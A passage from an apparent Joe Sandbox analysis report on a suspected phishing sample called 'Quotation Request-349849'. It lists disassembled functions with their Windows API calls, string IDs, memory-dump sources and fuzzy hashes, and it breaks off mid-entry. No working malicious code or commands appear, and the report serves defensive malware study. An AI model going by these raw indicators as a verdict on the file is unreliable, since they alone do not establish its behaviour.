                                                      • GetDriveTypeW.KERNEL32(00000061,008889A0,00000061), ref: 0083A9D5
                                                      • _wcscpy.LIBCMT ref: 0083A9FF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: BuffCharDriveLowerType_wcscpy
                                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                      • API String ID: 2820617543-1000479233
                                                      • Opcode ID: e534f7dc7d525c97d8a11f4ead546b853f4899f0f68048c9a7c6824c00c4dd88
                                                      • Instruction ID: 71905554f7a8056d9d737999af81d70c6e83ff3fa9b85dca2576a33debd5b848
                                                      • Opcode Fuzzy Hash: e534f7dc7d525c97d8a11f4ead546b853f4899f0f68048c9a7c6824c00c4dd88
                                                      • Instruction Fuzzy Hash: F4518D31108301DBC708EF14C996A6EBBA5FF84744F50482EFA95A73A2DB359909CB93
                                                      Function 007D9837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: __i64tow__itow__swprintf
                                                      • String ID: %.15g$0x%p$False$True
                                                      • API String ID: 421087845-2263619337
                                                      • Opcode ID: 5dbe0c180fbf4ea69ab649105098b8c9dc7b26f731c9259f45db3f89fee0a5f6
                                                      • Instruction ID: 5d43f6c3ff926a3cfab3778281b6fc31cb54361410b77473df5e5e5bcff223e6
                                                      • Opcode Fuzzy Hash: 5dbe0c180fbf4ea69ab649105098b8c9dc7b26f731c9259f45db3f89fee0a5f6
                                                      • Instruction Fuzzy Hash: BC41B171600209EFEB24DF38DC46A7A73F8FF05700F2044AEE649D7392EA3999419B50
                                                      Function 00857152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 0085716A
                                                      • CreateMenu.USER32 ref: 00857185
                                                      • SetMenu.USER32(?,00000000), ref: 00857194
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00857221
                                                      • IsMenu.USER32(?), ref: 00857237
                                                      • CreatePopupMenu.USER32 ref: 00857241
                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0085726E
                                                      • DrawMenuBar.USER32 ref: 00857276
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                      • String ID: 0$F
                                                      • API String ID: 176399719-3044882817
                                                      • Opcode ID: 1353c8c2042c4d7dc9e2d12887e4bc3150b8a2f0f70c6417c99c7a5284f3b1ff
                                                      • Instruction ID: f0d0cb5b003281c445ac502e5065c9a3145c86bd569ce65a012e8b3061472a88
                                                      • Opcode Fuzzy Hash: 1353c8c2042c4d7dc9e2d12887e4bc3150b8a2f0f70c6417c99c7a5284f3b1ff
                                                      • Instruction Fuzzy Hash: 6C413674A01309EFDB20DFA4E984E9A7BB5FF48352F148029FE06A7361D731A914CB90
                                                      Function 008574BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0085755E
                                                      • CreateCompatibleDC.GDI32(00000000), ref: 00857565
                                                      • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00857578
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00857580
                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 0085758B
                                                      • DeleteDC.GDI32(00000000), ref: 00857594
                                                      • GetWindowLongW.USER32(?,000000EC), ref: 0085759E
                                                      • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 008575B2
                                                      • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 008575BE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                      • String ID: static
                                                      • API String ID: 2559357485-2160076837
                                                      • Opcode ID: e06e1a7395bdb9f321265f9c083659d375c4a1402382004938685067a1f3bb58
                                                      • Instruction ID: 215f18eaeecd220845face38784550c58ef2d1c12d403a8f3d88c09d5f67c3c9
                                                      • Opcode Fuzzy Hash: e06e1a7395bdb9f321265f9c083659d375c4a1402382004938685067a1f3bb58
                                                      • Instruction Fuzzy Hash: 9F317832104214BBDF129F64EC08FEB3BA9FF09362F104224FA15E21A1D735D815DBA4
                                                      Function 007F6E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 007F6E3E
                                                        • Part of subcall function 007F8B28: __getptd_noexit.LIBCMT ref: 007F8B28
                                                      • __gmtime64_s.LIBCMT ref: 007F6ED7
                                                      • __gmtime64_s.LIBCMT ref: 007F6F0D
                                                      • __gmtime64_s.LIBCMT ref: 007F6F2A
                                                      • __allrem.LIBCMT ref: 007F6F80
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007F6F9C
                                                      • __allrem.LIBCMT ref: 007F6FB3
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007F6FD1
                                                      • __allrem.LIBCMT ref: 007F6FE8
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007F7006
                                                      • __invoke_watson.LIBCMT ref: 007F7077
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                      • String ID:
                                                      • API String ID: 384356119-0
                                                      • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                      • Instruction ID: ffaa8ddeb7839884007ba40a874c4c0bbee2b30fa01c6e7e0240534cfaa190f8
                                                      • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                      • Instruction Fuzzy Hash: AC71B476A00B1BABD718AA68DC41B7AB7A8FF04724F144229F614D73C1EB78DA40C791
                                                      Function 00832527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 00832542
                                                      • GetMenuItemInfoW.USER32(00895890,000000FF,00000000,00000030), ref: 008325A3
                                                      • SetMenuItemInfoW.USER32(00895890,00000004,00000000,00000030), ref: 008325D9
                                                      • Sleep.KERNEL32(000001F4), ref: 008325EB
                                                      • GetMenuItemCount.USER32(?), ref: 0083262F
                                                      • GetMenuItemID.USER32(?,00000000), ref: 0083264B
                                                      • GetMenuItemID.USER32(?,-00000001), ref: 00832675
                                                      • GetMenuItemID.USER32(?,?), ref: 008326BA
                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00832700
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00832714
                                                      • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00832735
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                      • String ID:
                                                      • API String ID: 4176008265-0
                                                      • Opcode ID: 0e1ce4d46db35ee3a3126308af0fa6dde0cb168655d4abf830ce781c1c306ce7
                                                      • Instruction ID: 6669a87de367bbf8032645cf01f8f183bbbe7d84e535a8c2f85cb329ac3229ae
                                                      • Opcode Fuzzy Hash: 0e1ce4d46db35ee3a3126308af0fa6dde0cb168655d4abf830ce781c1c306ce7
                                                      • Instruction Fuzzy Hash: BD618BB0900249AFDF11DFA8DC89DBE7BB9FB81308F144059E942E7251E735AE05DBA1
                                                      Function 00856F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00856FA5
                                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00856FA8
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00856FCC
                                                      • _memset.LIBCMT ref: 00856FDD
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00856FEF
                                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00857067
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$LongWindow_memset
                                                      • String ID:
                                                      • API String ID: 830647256-0
                                                      • Opcode ID: e19e47ed134139b1efdd65c5f30b0208f82a6c49ff13145edaa21b399b3504d4
                                                      • Instruction ID: ffa416d92269ed9b10af20328c1a9e828a5738b45327834be8bf831a3daea436
                                                      • Opcode Fuzzy Hash: e19e47ed134139b1efdd65c5f30b0208f82a6c49ff13145edaa21b399b3504d4
                                                      • Instruction Fuzzy Hash: ED615875900208AFDB11DFA8DC81EEE77F8FB08711F14416AFA14EB2A1D771AA45CB90
                                                      Function 00826B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00826BBF
                                                      • SafeArrayAllocData.OLEAUT32(?), ref: 00826C18
                                                      • VariantInit.OLEAUT32(?), ref: 00826C2A
                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00826C4A
                                                      • VariantCopy.OLEAUT32(?,?), ref: 00826C9D
                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 00826CB1
                                                      • VariantClear.OLEAUT32(?), ref: 00826CC6
                                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 00826CD3
                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00826CDC
                                                      • VariantClear.OLEAUT32(?), ref: 00826CEE
                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00826CF9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                      • String ID:
                                                      • API String ID: 2706829360-0
                                                      • Opcode ID: e46854489863b6ccbb0c0278d68ee1eeea3b737b8a4756170c86b48454522e6f
                                                      • Instruction ID: ed37ee4f5c9c514204a6a8b3d5ab245f3c14c0f4615f36566ed5bb6dbe3baa2a
                                                      • Opcode Fuzzy Hash: e46854489863b6ccbb0c0278d68ee1eeea3b737b8a4756170c86b48454522e6f
                                                      • Instruction Fuzzy Hash: C2414275A00229DFCF00EF68D848DAEBBB9FF08355F008069EA55E7261DB34A955CB94
                                                      Function 008483BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 007D9837: __itow.LIBCMT ref: 007D9862
                                                        • Part of subcall function 007D9837: __swprintf.LIBCMT ref: 007D98AC
                                                      • CoInitialize.OLE32 ref: 00848403
                                                      • CoUninitialize.OLE32 ref: 0084840E
                                                      • CoCreateInstance.OLE32(?,00000000,00000017,00862BEC,?), ref: 0084846E
                                                      • IIDFromString.OLE32(?,?), ref: 008484E1
                                                      • VariantInit.OLEAUT32(?), ref: 0084857B
                                                      • VariantClear.OLEAUT32(?), ref: 008485DC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                      • API String ID: 834269672-1287834457
                                                      • Opcode ID: 021cea301bab1100333aa72cff3de401a57955e36ca9bc01552c03cef95708f2
                                                      • Instruction ID: 29d39db67b53f09ca510f2cb589c76c5e31ebd59c213778ec6d279e2d3ec242a
                                                      • Opcode Fuzzy Hash: 021cea301bab1100333aa72cff3de401a57955e36ca9bc01552c03cef95708f2
                                                      • Instruction Fuzzy Hash: AA61567060831AEFC710DF24C848A6EBBE8FF49754F00445AFA85DB291CB74E948CB96
                                                      Function 00845732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • WSAStartup.WSOCK32(00000101,?), ref: 00845793
                                                      • inet_addr.WSOCK32(?,?,?), ref: 008457D8
                                                      • gethostbyname.WSOCK32(?), ref: 008457E4
                                                      • IcmpCreateFile.IPHLPAPI ref: 008457F2
                                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00845862
                                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00845878
                                                      • IcmpCloseHandle.IPHLPAPI(00000000), ref: 008458ED
                                                      • WSACleanup.WSOCK32 ref: 008458F3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                      • String ID: Ping
                                                      • API String ID: 1028309954-2246546115
                                                      • Opcode ID: b6cd6ea5eccd5a50a14da1c141760621c51885665f9eb6306e3f2461be304ca5
                                                      • Instruction ID: 938e0fdbdd0b53a41b3259351285794db1f198ad07f4ac731a13bd181e86f815
                                                      • Opcode Fuzzy Hash: b6cd6ea5eccd5a50a14da1c141760621c51885665f9eb6306e3f2461be304ca5
                                                      • Instruction Fuzzy Hash: 76513871604704DFDB11AF24D849B2EBBE4FB48724F04492AFA56DB2A2DB74E900DB52
                                                      Function 0083B4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 0083B4D0
                                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0083B546
                                                      • GetLastError.KERNEL32 ref: 0083B550
                                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 0083B5BD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Error$Mode$DiskFreeLastSpace
                                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                      • API String ID: 4194297153-14809454
                                                      • Opcode ID: f306679a139d4a3a5c3a74858183b72ddb5691b70ff804483e2e56f6285b7ec9
                                                      • Instruction ID: 28cc53659a519e75564d6c8956cea61f3a0000439a3d1c5c7baa53c100ce8a88
                                                      • Opcode Fuzzy Hash: f306679a139d4a3a5c3a74858183b72ddb5691b70ff804483e2e56f6285b7ec9
                                                      • Instruction Fuzzy Hash: 913192B5A00209EFCB10EF68C849EADBBB4FF84315F504166E616D7391DB749A41CB91
                                                      Function 00828F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 007D7DE1: _memmove.LIBCMT ref: 007D7E22
                                                        • Part of subcall function 0082AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0082AABC
                                                      • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00829014
                                                      • GetDlgCtrlID.USER32 ref: 0082901F
                                                      • GetParent.USER32 ref: 0082903B
                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 0082903E
                                                      • GetDlgCtrlID.USER32(?), ref: 00829047
                                                      • GetParent.USER32(?), ref: 00829063
                                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 00829066
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 1536045017-1403004172
                                                      • Opcode ID: a65fc0e901578192fad30850dee38a1752c36cc59914c36f0b4ef58e7cd4d2e5
                                                      • Instruction ID: d0e9324285a9655f2e6d19479825ef3075aa7c013c1681eafe23852635143bd4
                                                      • Opcode Fuzzy Hash: a65fc0e901578192fad30850dee38a1752c36cc59914c36f0b4ef58e7cd4d2e5
                                                      • Instruction Fuzzy Hash: 6321F870A00218BBDF04ABA4DC89EFEBBB5FF59310F100116F961972A2EB795855DB20
                                                      Function 0082907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 007D7DE1: _memmove.LIBCMT ref: 007D7E22
                                                        • Part of subcall function 0082AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0082AABC
                                                      • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 008290FD
                                                      • GetDlgCtrlID.USER32 ref: 00829108
                                                      • GetParent.USER32 ref: 00829124
                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00829127
                                                      • GetDlgCtrlID.USER32(?), ref: 00829130
                                                      • GetParent.USER32(?), ref: 0082914C
                                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 0082914F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 1536045017-1403004172
                                                      • Opcode ID: 68ea218545e5c96cc17f9d112b976e55ef9302a8868e0b41b6bbd42caa256363
                                                      • Instruction ID: 9c7ea70b4243e675ec57a9225dc28296d746198ea57034711aca2c39f6d78740
                                                      • Opcode Fuzzy Hash: 68ea218545e5c96cc17f9d112b976e55ef9302a8868e0b41b6bbd42caa256363
                                                      • Instruction Fuzzy Hash: F921F874A00218BBDF04ABA4DC89EFEBBB4FF54300F100016F551D72A2EB795455DB20
                                                      Function 00829163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetParent.USER32 ref: 0082916F
                                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00829184
                                                      • _wcscmp.LIBCMT ref: 00829196
                                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00829211
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameParentSend_wcscmp
                                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                      • API String ID: 1704125052-3381328864
                                                      • Opcode ID: 6e78c074890dac42a9184e4f61b1405b4c0882afff66003f583d6b069b0f8ae5
                                                      • Instruction ID: 94ef18467d6b8773444711c96b9dc97768fe9255e2fe61a43c10ed2f944bee29
